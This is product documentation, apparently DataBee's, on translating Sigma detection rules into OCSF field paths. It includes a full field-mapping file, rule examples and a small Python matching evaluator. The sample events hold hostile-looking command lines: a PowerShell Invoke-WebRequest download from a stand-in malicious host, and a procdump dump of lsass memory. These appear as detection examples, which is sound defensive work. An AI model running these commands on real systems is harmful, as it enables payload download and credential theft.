Sigma detection enables detection rules written in Sigma format to work effectively on telemetry data formatted in OCSF (Open Cybersecurity Schema Framework). Sigma detection bridges the gap by dynamically translating Sigma-defined fields into OCSF-compatible structures, so rules can run on normalized data across multiple sources.
How Sigma Detection Translates Sigma Rules
Field Matching
Sigma detection maintains a mapping file that connects each Sigma field to the OCSF fields it is likely to correspond to.
Example:
Sigma field: CommandLine
Matched OCSF field: cmd_line
You don’t need to write these mappings yourself; Sigma detection already knows which Sigma fields to look for.
Schema-Aware Path Matching
Sigma detection uses the OCSF schema to find every path in an event that ends in a given field, such as cmd_line.
These can include:
actor.process.cmd_line
assessment.assessor.process.cmd_line
evidences[].actor.process.cmd_line
This ensures your Sigma rule will match regardless of where the data is nested in an OCSF event.
Real-Time Event Evaluation
When an event arrives:
Sigma detection loads all known OCSF paths mapped to the Sigma field from its internal mapping.
Each Sigma field can have multiple possible OCSF paths. These are maintained as a list of valid paths for evaluation.
The system traverses the incoming event structure to search for any of these paths.
If any one of the paths exists and contains a valid value, that value is evaluated against the Sigma rule condition.
If the condition is satisfied for any matching path, Sigma detection generates a finding for that rule.
Example:
Sigma Rule:
detection:
  selection:
    CommandLine|endswith: '.exe'
  condition: selection
OCSF Event:
{
  "actor": {
    "process": {
      "cmd_line": "powershell.exe"
    }
  }
}
Result: Match — because cmd_line ends with .exe.
Logsource Field Behavior
When writing Sigma rules, it’s common to include a logsource field to restrict detections to specific types of logs. In DataBee, the logsource field is not currently enforced, meaning all rules are evaluated against all incoming events regardless of the logsource definition.
However, it is recommended to include it in your rules for consistency and forward compatibility, as support for restricting detections based on logsource may be added in the future.
Field Mapping Reference
For full visibility into how Sigma fields are translated to OCSF field paths in DataBee, we have included the entire mapping file used by the detection engine. The complete mapping follows.
{ "TargetFilename": [ "file.path", "file.name" ], "Image": [ "image.path", "process.file.path" ], "CommandLine": [ "cmd_line" ], "ParentImage": [ "actor.process.file.path", "actor.process.parent_process.file.path", "process.parent_process.file.path", "logon_process.parent_process.file.path" ], "Signature": [ "file.signature.certificate.issuer" ], "Filename": [ "file.name" ], "c-uri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", "vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "cs-host": [ "url.hostname" ], "c-useragent": [ "http_request.user_agent" ], "cs-method": [ "http_request.http_method" ], "sc-status": [ "http_status" ], "dst_ip": [ "dst_endpoint.ip" ], "cs-cookie": [ "http_cookies[].value", "identifier_cookie" ], "cs-uri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", "vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "c-uri-query": [ "url.query_string" ], "cs-uri-query": [ "url.query_string" ], "cs-user-agent": [ "http_request.user_agent" ], "src_ip": [ "src_endpoint.ip" ], "dst_port": [ "dst_endpoint.port" ], "action": [ "activity_id" ], "path": [ "path" ], "query": [ "url.query_string" ], "qtype_name": [ "query.type", "query.opcode_id" ], "answers": [ "answers", "answers[].rdata" ], "status_code": [ "status_code" ], "uri": [ "url" ], "client_header_names": [ "http_headers[].name" ], "name": [ "device.name" ], "request_type": [ "http_request.http_method" ], "cipher": [ "cipher.cipher" ], "resp_mime_types": [ "http_response.content_type" ], "user_agent": [ "http_request.user_agent" ], "endpoint": [ "src_endpoint.name", "dst_endpoint.name" ], "certificate.serial": [ 
"certificate.serial_number" ], "answer": [ "answers" ], "destination.port": [ "dst_endpoint.port" ], "event.category": [ "category_name" ], "host.scan.vuln_name": [ "vulnerabilities[].title" ], "type": [ "device.type", "finding.types_" ], "Imphash": [ "fingerprints[].value", "fingerprint.value", "digest.value", "hash.value", "hashes[].value", "ja3_hash.value", "ja3s_hash.value" ], "operation": [ "operation" ], "syscall": [ "kernel.system_call" ], "cwd": [ "command" ], "comm": [ "process.name" ], "ParentCommandLine": [ "cmd_line" ], "User": [ "user.name", "user.id" ], "LogonId": [ "actor.session.uid" ], "CurrentDirectory": [ "process.file.parent_folder" ], "USER": [ "user.name", "user.id" ], "DestinationHostname": [ "dst_endpoint.hostname" ], "DestinationIp": [ "dst_endpoint.ip" ], "riskEventType": [ "metadata.event_code" ], "Category": [ "category_name" ], "Status": [ "status" ], "FileName": [ "file.name" ], "ActivityType": [ "activity_name" ], "properties.message": [ "message" ], "failure_status_reason": [ "status_detail" ], "TargetResources": [ "resources" ], "AuthenticationRequirement": [ "requirements" ], "DeviceDetail.deviceId": [ "device.uid" ], "DeviceDetail.trusttype": [ "device.is_trusted" ], "RiskState": [ "device.risk_level", "risk_level" ], "Count": [ "count" ], "userAgent": [ "http_request.user_agent" ], "DeviceDetail.isCompliant": [ "device.is_compliant" ], "ClientApp": [ "app.name" ], "Username": [ "user.name" ], "ResourceDisplayName": [ "resources[].name", "resource.name" ], "AppId": [ "app.uid" ], "eventName": [ "metadata.log_name" ], "status": [ "status" ], "CategoryValue": [ "category_uid" ], "ResourceId": [ "resources[].uid" ], "Operation": [ "operation" ], "event_type_id": [ "type_uid" ], "debugContext.debugData.requestUri": [ "url.url_string", "metadata.product.url_string", "web_resources[].url_string", "app.url_string", "file_result.product.url_string", "file.product.url_string", "malware[].cves[].product.url_string", 
"vulnerabilities[].cve.product.url_string", "web_resources_result[].url_string" ], "displaymessage": [ "message" ], "actor.alternateid": [ "actor.user.uid_alt" ], "outcome.result": [ "status_detail" ], "userIdentity.arn": [ "user.uid" ], "errorMessage": [ "error_message" ], "errorCode": [ "code" ], "requestParameters": [ "http_request.args" ], "userIdentity.type": [ "user.type" ], "userIdentity.sessionContext.sessionIssuer.type": [ "session.issuer" ], "requestParameters.containerDefinitions.command": [ "process.cmd_line", "job.cmd_line" ], "eventType": [ "finding.types_" ], "EventID": [ "metadata.uid" ], "InterfaceUuid": [ "device.interface_uid" ], "OpNum": [ "opnum" ], "Type": [ "type" ], "SourceFilename": [ "file.name" ], "CreationUtcTime": [ "created_time" ], "Destination": [ "dst_endpoint" ], "Data": [ "data" ], "ScriptBlockText": [ "cmd_line" ], "Path": [ "path" ], "TargetImage": [ "image.path" ], "SourceImage": [ "image.name", "process.file.path" ], "SourceUser": [ "user" ], "Provider_Name": [ "actor.idp.name" ], "Description": [ "message", "process.file.desc", "device.desc" ], "OriginalFileName": [ "file.path", "file.name" ], "Hashes": [ "file.hashes" ], "Device": [ "device" ], "TargetObject": [ "resource.name" ], "Details": [ "details" ], "StartFunction": [ "module.function_name" ], "StartAddress": [ "module.start_address" ], "TargetParentProcessId": [ "process.parent_process.pid" ], "IntegrityLevel": [ "process.integrity" ], "Product": [ "metadata.product.name" ], "md5": [ "file.md5" ], "sha1": [ "file.sha1" ], "sha256": [ "file.sha256" ], "Company": [ "company_name" ], "FileVersion": [ "file.version" ], "State": [ "state" ], "ApplicationPath": [ "app.path" ], "Action": [ "activity_id" ], "UserName": [ "device.owner.full_name" ], "subjectName": [ "certificate.subject", "email.subject" ], "SamAccountName": [ "account.name" ], "TargetUserName": [ "user.name" ], "TargetSid": [ "device.uid" ], "SubjectUserName": [ "user.name" ], "AccessMask": [ "access_mask" 
], "AccessList": [ "access_list" ], "ServiceName": [ "service.name" ], "ServiceFileName": [ "file.name", "file.path" ], "LogonType": [ "logon_type" ], "ProcessName": [ "process.name", "logon_process.name" ], "service": [ "service" ], "SubjectUserSid": [ "user.uid" ], "SubjectDomainName": [ "user.domain", "device.domain", "network_endpoint.domain", "network_proxy.domain" ], "AuditPolicyChanges": [ "policy.uid" ], "PrivilegeList": [ "groups.privileges", "privileges" ], "Service": [ "service" ], "AttributeValue": [ "attributes" ], "DestPort": [ "dst_endpoint.port" ], "ClientProcessId": [ "process.pid", "logon_process.pid" ], "ParentProcessId": [ "process.parent_process.pid", "logon_process.parent_process.pid" ], "FailureCode": [ "error" ], "ClassName": [ "class_name" ], "DeviceDescription": [ "device.desc" ], "SourcePort": [ "src_endpoint.port" ], "DestAddress": [ "dst_endpoint.ip" ], "Application": [ "app" ], "IpAddress": [ "device.ip" ], "TargetOutboundUserName": [ "user.name" ], "TargetUserSid": [ "user.uid" ], "Provider": [ "provider" ], "Query": [ "url.query_string" ], "processPath": [ "process.lineage", "logon_process.lineage" ], "process": [ "process.name", "logon_process.name" ], "ProcessPath": [ "actor.file.process.path" ], "ImageName": [ "device.image.name", "process.file.name" ], "Name": [ "name" ], "AppID": [ "app.uid" ], "ImagePath": [ "image.path" ], "AccountName": [ "account.name" ], "ProcessId": [ "logon_process.pid", "process.pid" ], "Caption": [ "caption" ], "Value": [ "enrichments[].value", "server_hassh.fingerprint.value", "client_hassh.fingerprint.value", "http_cookies[].value", "http_headers[].value", "metrics[].value", "observables[].value" ], "SourceName": [ "src_endpoint.name" ], "Feature_Name": [ "app.feature.name" ], "AppName": [ "app.name" ], "Message": [ "http_request.message", "http_response.message" ], "ErrorCode": [ "http_request.code", "http_response.code" ], "RequestedPolicy": [ "authorizations[].policy" ], "Protocol": [ 
"auth_protocol", "connection_info.protocol_name" ], "DestinationPort": [ "dst_endpoint.port" ], "DestinationIsIpv6": [ "dst_endpoint.ip" ], "SourceIp": [ "src_endpoint.ip" ], "SourceHostname": [ "src_endpoint.hostname" ], "Hash": [ "hash" ], "DeviceName": [ "device.name" ], "AuditSourceName": [ "resource.name" ] }
Sigma Rules Directly Using OCSF Fields
While Sigma detection supports traditional Sigma rules that use generic field names (which are internally translated to OCSF fields), users can also write Sigma rules directly using OCSF field paths. This approach can reduce false positives, because the rule targets one precise path instead of every candidate path the mapping would expand to.
How to Write an OCSF-Native Sigma Rule
You can reference specific OCSF field paths in the detection section of your Sigma rule using dot notation, as shown in the examples below.
Examples:
Example 1
Sigma Rule:
...
detection:
  selection:
    actor.process.file.name: 'WINWORD.EXE'
  condition: selection
...
Event:
{
  "actor": {
    "process": {
      "file": {
        "name": "WINWORD.EXE"
      }
    }
  }
}
This rule matches the event because the value at the specified OCSF path actor.process.file.name is exactly 'WINWORD.EXE', which satisfies the condition defined in the Sigma rule.
Example 2
Sigma Rule:
...
detection:
  selection:
    actor.process.file.name: 'powershell.exe'
    actor.process.command_line|contains: 'Invoke-WebRequest'
  condition: selection
...
Event:
{
  "actor": {
    "process": {
      "file": {
        "name": "powershell.exe"
      },
      "command_line": "powershell.exe -nop -c Invoke-WebRequest http://malicious.site"
    }
  }
}
The rule looks for powershell.exe being executed with a command line that includes Invoke-WebRequest, indicating potentially malicious behavior. Both selection fields must match for the rule to fire.
Example 3
Sigma Rule:
...
detection:
  selection1:
    actor.process.file.name: 'lsass.exe'
  selection2:
    actor.process.parent.file.name: 'procdump.exe'
  selection3:
    actor.process.command_line|contains: '-ma'
  condition: selection1 and selection2 and selection3
...
Event:
{
  "actor": {
    "process": {
      "file": {
        "name": "lsass.exe"
      },
      "parent": {
        "file": {
          "name": "procdump.exe"
        }
      },
      "command_line": "procdump.exe -ma lsass.exe C:\\dump.dmp"
    }
  }
}
This rule combines multiple conditions across different parts of the event structure. All must be true for a match.
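The following is an added example, not DataBee's own code, showing in a few lines how the two matching modes on this page fit together: a Sigma field name (Real-Time Event Evaluation above) expands to every candidate OCSF path, with "[]" marking a list to fan out over, while a dotted name absent from the mapping is treated as an OCSF-native path (Examples 1 to 3 above). The mapping subset, the rules and the events are constructed for the example, and the condition grammar is limited to "selA and selB".

```python
# Added example, not DataBee's own code: a minimal evaluator for the matching
# described above. A Sigma field name expands to every candidate OCSF path
# ("[]" marks a list to fan out over, as in evidences[].actor.process.cmd_line);
# a dotted name absent from the mapping is treated as an OCSF-native path.
# The mapping subset, the rules and the events are constructed for this example.
FIELD_PATHS = {"CommandLine": ["actor.process.cmd_line", "evidences[].actor.process.cmd_line"]}
# Sigma string modifiers; Sigma matching is case-insensitive by default.
MODIFIERS = {
    "": lambda v, p: str(v).lower() == p.lower(),
    "contains": lambda v, p: p.lower() in str(v).lower(),
    "endswith": lambda v, p: str(v).lower().endswith(p.lower()),
}

def resolve(node, path):
    """Yield every value reachable at a dotted path, fanning out over '[]' lists."""
    if not isinstance(node, dict):
        return
    key, _, rest = path.partition(".")
    fan_out = key.endswith("[]")
    value = node.get(key[:-2] if fan_out else key)
    items = value if fan_out and isinstance(value, list) else [value]
    for item in items:
        if item is None:
            continue
        yield from resolve(item, rest) if rest else (item,)

def field_matches(event, spec, pattern):
    """spec is 'Field' or 'Field|modifier'; a value at any candidate path may satisfy it."""
    name, _, mod = spec.partition("|")
    if mod not in MODIFIERS:
        raise ValueError(f"unsupported modifier: {mod}")
    return any(MODIFIERS[mod](v, pattern) for p in FIELD_PATHS.get(name, [name])
               for v in resolve(event, p))

def rule_matches(event, detection):
    """Evaluate a detection whose condition is 'selA and selB ...' (a subset of Sigma)."""
    names = [t for t in detection["condition"].split() if t != "and"]
    return all(all(field_matches(event, s, p) for s, p in detection[n].items()) for n in names)

# Mapped-field rule from the page, against an event where cmd_line sits under evidences[].
MAPPED_RULE = {"selection": {"CommandLine|endswith": ".exe"}, "condition": "selection"}
MAPPED_EVENT = {"evidences": [{"actor": {"process": {"cmd_line": "powershell.exe"}}}]}
# OCSF-native rule (Example 3 above): three selections that must all hold.
NATIVE_RULE = {"selection1": {"actor.process.file.name": "lsass.exe"},
               "selection2": {"actor.process.parent.file.name": "procdump.exe"},
               "selection3": {"actor.process.command_line|contains": "-ma"},
               "condition": "selection1 and selection2 and selection3"}
NATIVE_EVENT = {"actor": {"process": {"file": {"name": "lsass.exe"},
                "parent": {"file": {"name": "procdump.exe"}},
                "command_line": "procdump.exe -ma lsass.exe C:\\dump.dmp"}}}
```

Note that the mapped rule matches the nested evidences[] event as well as the page's flat actor.process event, while an event carrying only command_line (not cmd_line) does not satisfy it, which is the precision trade-off the OCSF-native section describes.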
Key Takeaways
Write Sigma rules using Sigma field names (like CommandLine) — no need to reference OCSF paths.
Sigma detection automatically maps and traverses OCSF events for you.
Your rule logic is applied to all valid paths, ensuring broader and more accurate detection.
Tip
If you’re unsure whether a specific Sigma field is supported:
Contact the Analytics team.
Or request new field support as needed.